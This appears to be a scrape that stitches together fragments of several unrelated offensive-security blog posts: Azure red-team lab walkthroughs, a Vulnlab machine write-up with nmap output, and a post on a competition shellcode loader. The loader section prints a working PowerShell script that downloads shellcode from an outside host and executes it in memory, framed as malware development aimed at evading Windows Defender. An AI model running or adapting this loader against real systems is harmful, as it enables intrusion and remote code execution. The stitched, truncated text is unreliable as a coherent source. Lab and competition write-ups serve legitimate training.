Scenario

1

Your red team is on an engagement and has successfully phished a Mega Big Tech employee to gain their credentials. So far, increasing access within Azure has reached a dead end, and you have been tasked with unlocking further access. In scope is the entire on-premises and cloud infrastructure. Your goal is to gain access to customer records and demonstrate impact.

Walkthrough

I was provided Azure credentials [email protected]:MegaBigTech99 and tasked with pillaging on-premises and cloud infrastructure to exfiltrate customer records.

To accomplish this task, I will use GraphRunner, a toolset for reconnaissance, persistence, and data pillaging. It interacts with the Microsoft Graph API using the credentials and tokens it is given.

Microsoft Graph API is a unified API endpoint that allows developers and administrators to interact with data and services across Microsoft 365 and Azure, including Outlook, SharePoint, Teams, OneDrive, and even custom applications registered in Entra ID.

Azure uses many token types, but the primary ones are the ID token, the access token, and the refresh token. I will give a quick TLDR for each below.

ID token: Used to verify the identity of a user when they access an application. Applications include Teams, Outlook, or SharePoint. The ID token proves who the user is so the app can sign them in and establish a session.

Access token: Defines what the user is allowed to access within a specific resource. In the context of GraphRunner, the resource is the Microsoft Graph API. Other examples include Azure Key Vault or applications that expose protected APIs. For example, I use an ID token to authenticate to SharePoint and an access token to request data from groups or folders within SharePoint.

Refresh token: Used to obtain a new access token without requiring the user to reauthenticate. Refresh tokens have a longer lifetime than access tokens. By default, refresh token lifetimes range from 24 hours for single page apps to 90 days for other app types, while access tokens are usually valid for about one hour. If an attacker obtains a user’s refresh token through social engineering or a malicious app consent, it can be used as a form of persistence.

Scenario:

1
2
3

Mega Big Tech have adopted a hybrid cloud architecture and continues to use a local on-premise Active Directory domain, as well as the Azure cloud. They are wary of being targeted due to their importance in the tech world, and have asked your team to assess the security of their infrastructure, including cloud services. An interesting URL has been found in some public documentation, and you are tasked with assessing it.

🚨 Mega Big Tech will begin rolling out their own External Authentication Provider to reduce yearly operating costs. However, threat actors have already compromised the custom provider and altered its configuration. As a result, any Multifactor Authentication (MFA) challenge will now automatically return as successful, ultimately satisfying any Conditional Access Policy (CAP) that requires the standalone-MFA grant control (as opposed to the Authentication Strength-MFA grant control).

Walkthrough

I’ve been given the entry point of http://dev.megabigtech.com/$web/index.html with the task of enumerating Azure Blobs that may be tied to the domain and obtaining a flag.

For reference, Azure uses storage accounts, which can hold multiple containers, and those containers can hold Binary Large Objects (Blobs), which is just another fancy way of saying files.

Considering we’re looking for files pulled from these containers, let’s take a look at the network traffic when we load this website.

The URL for an Azure Blob Storage account is formatted as https://<storage-account-name>.blob.core.windows.net. Let’s make sure we keep a lookout for that.

When loading the website, we see assets loaded from https://mbtwebsite.blob.core.windows.net/$web.

We can assume that mbtwebsite is the storage account name and $web is the container name.

Background

This upcoming spring semester me and a few team members are competing in the Information Security Talent Search (ISTS) Competition hosted by the Rochester Institute of Technology. It is a three-day attack and defend competition, where teams compete in a King of the Hill style challenge by hacking and defending against other teams to keep their critical services such as HTTP, SMTP, and SNMP up for points.

The competition rules strictly prohibit the use of any anti-virus applications, but as a red-teamer, that doesn’t mean you start being noisy and dropping files to disk. At the end of the day, there’s some poor blue-team log bunny on the other end of the terminal picking up on the signatures and heuristics you are creating, itching to boot you off their system.

I didn’t participate in ISTS last year, but the previous red-teamers left me a few scripts, one of which was a local process injection to gain a shell through a stage-listener provided by the C2 framework, sliver. (See source below) [Update: I have learned this script was created by Dominic Breuker in a blog post]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress,
    uint dwSize,
    uint flAllocationType,
    uint flProtect);
[DllImport("kernel32", CharSet=CharSet.Ansi)]
public static extern IntPtr CreateThread(
    IntPtr lpThreadAttributes,
    uint dwStackSize,
    IntPtr lpStartAddress,
    IntPtr lpParameter,
    uint dwCreationFlags,
    IntPtr lpThreadId);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern UInt32 WaitForSingleObject(
    IntPtr hHandle,
    UInt32 dwMilliseconds);
}
"@
Add-Type $Win32

$shellcode = (New-Object System.Net.WebCLient).DownloadData("http://login.magic-box.dev:8080/balls.woff")
if ($shellcode -eq $null) {Exit};
$size = $shellcode.Length

[IntPtr]$addr = [Win32]::VirtualAlloc(0,$size,0x1000,0x40);
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $addr, $size)
$thandle=[Win32]::CreateThread(0,0,$addr,0,0,0);
[Win32]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")

For those reading in hopes of learning malware development, I will break down exactly how this works and what it is doing in the development section of this post, but first lets focus on how we can improve this.

Please bear with me as this is my first malware development project ever. I actually consider myself a really bad coder, but due to that, whenever embarking on new development endeavors I try my best to break it down to the most barebones level, and hopefully, I can do that for you here today.

Improvement

At a very high level, this script downloads the shellcode, allocates the size of the shellcode to the memory space of the current processes, copies the shellcode to that memory space and executes it as a new thread of the current process.

In theory, it works, and on a system without AV, or in this case, Windows Defender, you’d get a session that you can interact with. However, in the spirit of being stealthy, this sucks… sorry Josh.

High-level Overview 📜

Phantom is a medium rated Windows machine on Vulnlab. To gain access to the administrator credentials I leveraged null SMB authentication, RID-Cycling, and Resource Based Constrained Delegation with a user that had a MachineAccountQuota of 0.

Reconnaissance 📡

My default Nmap scan returned the following results.

Command:

1
2
3
4
5
6
7
8
9
10

 nmap -sVC -T4 -Pn 10.10.112.137 -oN phantom.txt

-sVC: Returns version of serivces and runs default NSE script for additional service enmeration such as smb2-security-mode

-T4: Allows for faster scannning. Default is T3, max is T5

-Pn: Disables host discovery, doesn't require machine to respond to a ping in order to find services.

-oN: Normal output to text file.

Response:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-31 13:46 EDT
Nmap scan report for 10.10.112.137
Host is up (0.14s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-08-31 17:46:39Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-08-31T17:47:26+00:00; +2s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: PHANTOM
|   NetBIOS_Domain_Name: PHANTOM
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: phantom.vl
|   DNS_Computer_Name: DC.phantom.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-08-31T17:46:46+00:00
| ssl-cert: Subject: commonName=DC.phantom.vl
| Not valid before: 2024-07-05T19:49:21
|_Not valid after:  2025-01-04T19:49:21
5357/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-08-31T17:46:49
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 2s, deviation: 0s, median: 1s

Due to the services listed, there seem to be few initial attack vectors. Here’s my current thought process.

• Port 53: Me and my homies hate DNS exploitation, I believe the only attack I know is a zone transfer, which trying this early, would be a waste of time and possibly a rabbit hole.

• Port 88: Kerberos is used for Authentication, not necessarily something I change around and exploit without access to security policies. However, what we can keep in mind are possible misconfigurations such as AESPRoasting and RID-Cycling.